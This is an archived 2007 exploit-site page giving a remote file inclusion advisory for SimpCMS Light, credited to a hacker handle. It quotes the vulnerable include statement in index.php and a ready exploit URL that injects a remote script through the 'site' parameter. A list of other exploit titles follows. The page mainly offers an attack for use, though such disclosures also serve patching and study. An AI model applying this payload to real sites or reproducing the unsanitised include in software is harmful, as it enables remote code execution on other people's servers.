exploits , vulnerabilities , articles , SimpCMS Light <= 04.10.2007 (site) Remote File Inclusion Vulnerability

2007-04-10

SimpCMS Light <= 04.10.2007 (site) Remote File Inclusion Vulnerability

Rated as : Moderate Risk

Bug Found By Dr.RoVeR -->Arab48 Hacker

Contact: Dr.RoVeR@HackerMail.CoM
---

Script: SimpCMS Light

Download: http://www.simpcms.com/light/normal/simp-cms-light.zip

--

Bug File: index.php

Bug code in line 31:
include $site.".php";

--

Exploit:
http://site.com/[path]/index.php?site=[EvilScript]

securitydot.net - 2007-04-10

Exploits - newest 10 RSS | More

2007-06-15 55498 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 32847 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 40878 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 28513 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19076 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16129 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 18739 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16018 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 32685 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 16646 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit